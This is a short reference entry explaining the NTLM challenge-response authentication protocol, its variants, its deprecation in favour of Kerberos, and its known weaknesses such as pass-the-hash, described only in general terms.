NT LAN Manager (NTLM)

Windows NT LAN Manager (NTLM) is a challenge-response authentication protocol used to authenticate a client to a resource on an Active Directory domain. When the client requests access to a service associated with the domain, the service sends a challenge to the client, requiring that the client to perform a mathematical operation using its authentication token, and then return the result of this operation to the service. The service may validate the result or send it to the Domain Controller (DC) for validation. If the service or DC confirm that the client’s response is correct, the service allows access to the client.

NTLM is a type of single sign-on (SSO) because it allows the user to provide the underlying authentication factor only once, at login.

The NTLM protocol suite is implemented in a Security Support Provider (SSP), a Win32 API used by Microsoft Windows systems to perform a variety of security-related operations such as authentication. The NTLM protocol suite includes LAN Manager authentication protocol, NTLMv1, NTLMv2 and NTLM2 Session protocols.

NTLM is widely deployed, even on new systems, to maintain compatibility with older systems, but is no longer recommended for use by Microsoft because NTLM does not support current cryptographic methods, such as AES or SHA-256. Microsoft adopted Kerberos as the preferred authentication protocol for Windows 2000 and subsequent Active Directory domains.

Frequently Asked Questions
Is NTLM secure?

NTLM is generally considered insecure because it uses outdated cryptography that is vulnerable to several modes of attacks. NTLM is also vulnerable to the pass-the-hash attack and brute-force attacks.

What is NTLM still used for?

NTLM is used is places where backwards compatibility is required. Microsoft does not recommend NTLM for new implementations.

What is NTLM proxy?

NTLM Proxy is a proxy software that allows users to authenticate using the NTLM protocol.

Does NTLM use the Kerberos protocol?

NTLM was replaced by Kerberos. Microsoft has added the NTLM hash to its implementation of the Kerberos protocol to improve interoperability. According to an independent researcher, this design decision allows Domain Controllers to be tricked into issuing an attacker with a Kerberos ticket if the NTLM hash is known.

Microsoft adopted Kerberos as the preferred authentication protocol for Windows 2000 and subsequent Active Directory domains.